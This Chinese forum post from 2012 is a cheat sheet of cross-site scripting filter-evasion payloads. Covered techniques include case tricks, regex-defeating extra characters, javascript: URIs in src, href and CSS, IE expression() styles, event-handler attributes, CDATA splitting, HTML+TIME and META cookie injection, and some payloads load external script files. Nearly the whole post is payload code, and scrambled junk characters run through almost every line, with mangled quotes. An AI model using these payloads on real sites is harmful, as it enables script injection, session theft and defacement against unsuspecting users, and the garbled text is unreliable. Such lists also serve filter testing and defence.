1. 改变字符大小写1 |9 Z1 B% U+ ]
9 Q4 s8 o. Y' N+ C* t 3 Z: a* E/ \/ y3 [/ z4 M- p
2 x% y0 ]! k, ~$ {6 E7 j% H6 ]
<sCript>alert(‘d’)</scRipT>! U# g& g+ ~( T% c
' [, k+ u1 m, a- K9 W- t6 b9 g7 o
2. 利用多加一些其它字符来规避Regular Expression的检查( [% Z& M- g% s
1 ?# P8 C9 e1 _ <<script>alert(‘c’)//<</script>+ b7 [" q$ G$ C. |/ s
4 P4 {& l5 g& g" U, T7 R9 I' P+ i <SCRIPT a=">" SRC="t.js"></SCRIPT>9 E. b# X0 L. O, R* p3 N
5 ]8 |3 q8 |# h- T3 D
<SCRIPT =">" SRC="t.js"></SCRIPT>
9 O. J* i$ N( r) X7 h$ Z! m% v; z( W- m. {1 C4 Q2 G
<SCRIPT a=">" ” SRC="t.js"></SCRIPT>2 j9 V3 l0 C. m, Y. ~
; t+ ~8 m; k% @* z9 a
<SCRIPT "a=’>’" SRC="t.js"></SCRIPT>
" Q5 b+ ~- w! } I; H' x0 ~- l4 j7 i& c+ ]$ A
<SCRIPT a=`>` SRC="t.js"></SCRIPT>& o) L: A3 C' R; m9 P6 S
0 b' P' y) u7 i% H4 }1 R. g& g <SCRIPT a=">’>" SRC="t.js"></SCRIPT>
9 k5 l! h! A/ h; T3 l- ]2 H
& W9 [ V* X* W! \; ~7 g m% H3. 以其它扩展名取代.js* e9 d0 Z+ ]9 ^4 N4 k
, b# Q+ g- I) Z/ o. u <script src="bad.jpg"></script>
5 L5 Z1 t, U% ]7 _; H6 M- h1 M/ {8 D# n
4. 将Javascript写在CSS档里/ w3 \, A: n( G1 H
& |% M: Q) g% B7 }4 G <LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">7 E5 L6 Q( Z% ^. B$ y! I
' z# K# L2 y4 ~: _$ U0 u' }: |% p3 w
example:9 F. o1 l+ [- }1 B
, c0 S, [) s; {: X, W
body {
7 o. D J5 e9 t6 }1 u8 F* q
3 j4 q- {5 `( D1 p( | background-image: url(‘javascript:alert("XSS");’)7 I2 w- u3 E: K, I) a( s
* D5 ^. a" B; j* U5 N# g: r) @
}
& U2 Q4 q' ~* p% }0 k* |
, _! V/ w3 t8 Y' {* M% F5. 在script的tag里加入一些其它字符
* o9 _8 y' i. [
9 I+ e1 v% S* w ^ <SCRIPT/SRC="t.js"></SCRIPT>! B0 `2 j( M+ A7 A9 q- [
9 e! m- H$ L% c$ ^+ @( q <SCRIPT/anyword SRC="t.js"></SCRIPT>
& s. a5 f5 E# F6 ^
) g/ E, r, Q+ u6. 使用tab或是new line来规避
& F+ b; g0 ~# r# d }( {
& \9 R+ i/ l I% f <img src="jav ascr ipt:alert(‘XSS3′)">
; i& J s, ^. c5 \% J$ w8 j; o5 @) D, |
<img src="jav ascr ipt:alert(‘XSS3′)">
! l6 O# D6 d! s0 d; H% b
2 {% A/ I+ |; }) D* h8 I <IMG SRC="jav ascript:alert(‘XSS’);">
% ]/ \ |, z6 l+ J/ h& j* ?+ m- N. ] s5 q+ b
-> tag; c, A- c- E, r8 e% N
/ ^/ J( F) M5 g& _% c& K; h! a; i -> new line
* @$ l3 {$ ]- j: r& U4 s, e- w% f4 K* k4 h
7. 使用"\"来规避- j8 w; l3 I X- G8 b8 P# }; v
: _, U: _* u( K: d0 Y <STYLE>@im\port’\ja\vasc\ript:alert("XSS32")’;</STYLE>
. i) j ? I! h% z+ v) n0 [8 X- `& b4 p$ Y: Y4 p
<IMG STYLE=’xss:expre\ssion(alert("XSS33"))’>7 c/ {5 W" X( H2 g" \; I
, c2 I( b9 f' ~( l5 _- j* z2 K <IMG STYLE="xss:expr/*anyword*/ession(alert(‘sss’))">) {* P* ~% {" [& C$ E; T
4 s' X8 n- f3 S, Y+ N( x8 ?
<DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">( c* j' ^, ~5 B; O V; S8 I9 {
# |' G+ b- J- r" | q
<A STYLE=’no\xss:noxss("*//*"); xss:ex/*XSS*//*/*/pression(alert("XSS"))’>7 T: ?/ R: F$ o* X3 N2 ^$ I3 j
2 j- Y4 W2 ]/ K2 u- m- N* g# W
8. 使用Hex encode来规避(也可能会把";"拿掉)( z$ h0 i8 K) H/ N! V8 U" h
2 m2 E% w* ]2 f% n' n- q0 o: i Z; Z <DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">5 M8 N! |. b5 r, [. j* ]
+ w7 h" |6 c( J. @- D
原始码:<DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">
! o* e7 _ c J2 X7 U4 I6 A$ l0 I( U) Y6 b# P- y& R
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(‘abc’);">7 a7 p% ]: d" Q3 q0 N
+ D' J4 C/ |4 j- J( ?( _' } 原始码:<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(‘abc’);">
' t8 L1 N' z ~, P1 [; l& ]" I, p/ @1 R" p+ H8 L$ `5 m0 f( K v
9. script in HTML tag& U4 s, f# L" U. z1 s f# a
% A- n" [3 d" f8 \
<body onload=」alert(‘onload’)」>, I9 p4 B& x3 r& N
% ~6 P& ?9 O. s( v onabort, onactivate, onafterprint, onafterupdate, onbeforeactivate, onbeforecopy, onbeforecut, onbeforedeactivate, onbeforeeditfocus, onbeforepaste, onbeforeprint, onbeforeunload, onbeforeupdate, onblur, onbounce, oncellchange, onchange, onclick, oncontextmenu, oncontrolselect, oncopy, oncut, ondataavailable, ondatasetchanged, ondatasetcomplete, ondblclick, ondeactivate, ondrag, ondragend, ondragenter, ondragleave, ondragover, ondragstart, ondrop, onerror, onerrorupdate, onfilterchange, onfinish, onfocus, onfocusin, onfocusout, onhelp, onkeydown, onkeypress, onkeyup, onlayoutcomplete, onload, onlosecapture, onmousedown, onmouseenter, onmouseleave, onmousemove, onmouseout, onmouseover, onmouseup, onmousewheel, onmove, onmoveend, onmovestart, onpaste, onpropertychange, onreadystatechange, onreset, onresize, onresizeend, onresizestart, onrowenter, onrowexit, onrowsdelete, onrowsinserted, onscroll, onselect, onselectionchange, onselectstart, onstart, onstop, onsubmit, onunload
8 b9 g& i4 s, k1 a& t' F3 Q3 k$ `4 H( w0 u* g5 c& y) R& `+ p
10. 在swf里含有xss的code
' f' q9 d% ~; c8 G E
7 s5 U% I8 ~1 u" `2 [1 V <EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>
9 P5 Y# Z6 e5 ^
/ O1 U* P) ?5 F# U- j11. 利用CDATA将xss的code拆开,再组合起来。
+ f: p: M. A5 ]9 v# @5 \; K, x% [$ ^5 a
<XML ID=I><X><C>" [" { S1 k1 k7 L# _8 ^( D
5 E) Q3 t3 i3 A: T; r2 {1 k w5 d <![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>
" w' N: @. h* ~+ @; P% h! v" b8 B/ c2 j e: g' l$ L
</C></X>
* c. W5 x* b9 n! ]) ~- H6 o$ F* Y9 f
</xml>5 L4 E1 a% S$ O7 s- ]4 @
! D7 v7 S G$ t0 Z+ E <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
- g' a2 j. U, N% x6 w
2 d: B" p9 b. W4 ?/ ] <XML ID="xss"><I><B><IMG SRC="javas<!– –>cript:alert(‘XSS’)"></B></I></XML>1 C" o( c- u7 L1 [1 u; Z
1 f& I) C& k, A" Q; r2 U J
<SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>. z2 y1 N' T ]/ }5 P! h
( R& Y! I" W8 e1 }" t5 m7 V12. 利用HTML+TIME。9 c4 x$ O% a1 U0 ]+ l
7 Y/ o4 ^% Y) I% p w/ ]
<HTML><BODY>
! Y; D+ ~5 Q# g) W6 V
4 c5 x1 X5 b# g; d S6 b <?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">
2 E' P: V' F1 [$ h0 K$ I: j1 P# J$ `& g
<?import namespace="t" implementation="#default#time2">* b6 C# F+ e t6 ^0 r" f6 M
4 ^: K/ s( n2 {1 y2 A <t:set attributeName="innerHTML" to="anyword<SCRIPTDEFER>alert("XSS")</SCRIPT>">+ ]5 C9 A4 j# G% N2 f
' S, K7 U( x, [$ x; B" @% U3 L8 x! E6 y </BODY></HTML>
2 k% B2 K' G4 f* \, G! T& [
; r; g* ]( K8 f: c7 b13. 透过META写入Cookie。
! q8 Y; h" F" G. `6 I: |
" ~1 B( y" @# |7 _$ c* J3 D* L! X <META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert(‘XSS’)</SCRIPT>">
* c r: r* g# I8 W2 q5 c: ^$ v1 R8 { s; |+ F5 `. D8 C
14. javascript in src , href , url+ [8 C: y A$ t O5 ]
: z7 E, B/ D) I2 m `: a* _8 N <IFRAME SRC=javascript:alert(’13′)></IFRAME>- W. a: I) S7 a; D+ e- r
. @2 w0 s6 O/ O; x <img src="javascript:alert(‘XSS3′)">
) ?& _! k. X9 r7 m: R2 s t; r9 r2 I" l
<IMG DYNSRC="javascript:alert(‘XSS20′)">
3 \' g5 w5 f' g1 n; m0 C- f2 m% {6 n2 g0 t/ G- D
<IMG LOWSRC="javascript:alert(‘XSS21′)">8 a# M" ~8 X+ C! s+ B
, U7 K9 I% m4 n' e, Q( {# z
<LINK REL="stylesheet" HREF="javascript:alert(‘XSS24′);">' b0 E/ d( I0 }5 i
1 q5 c; u _8 I' q6 v <IFRAME SRC=javascript:alert(‘XSS27′)></IFRAME>7 r# f: v. Y' X' B6 M2 n; V& m
! h$ a' g2 u* n |7 c <TABLE BACKGROUND="javascript:alert(‘XSS29′)">1 Y4 g% N, B8 ]) P O
- _9 b; d- O# C" ^7 r
<DIV STYLE="background-image: url(javascript:alert(‘XSS30′))">
* Z$ J8 k1 v2 A- x: @' U6 u$ c/ J: ]. {3 V+ [' D
<STYLE TYPE="text/css">.XSS{background image:url("javascript:alert(‘XSS35′)");}
1 z# L5 u% u! m- y$ p; q
. L! x$ n- m/ A) P- [ </STYLE><A CLASS=XSS></A>
. i8 ~9 h/ v- K# a
0 T/ t% O- j9 i2 F8 W5 }' `4 a <FRAMESET><FRAME SRC="javascript:alert(‘XSS’);"></FRAMESET>" F$ f5 c3 U4 v
1 m5 F# Y- X8 O7 }% ]1 ^& _$ Z
|
发表于 2012-12-31 09:59:28
收藏
支持
反对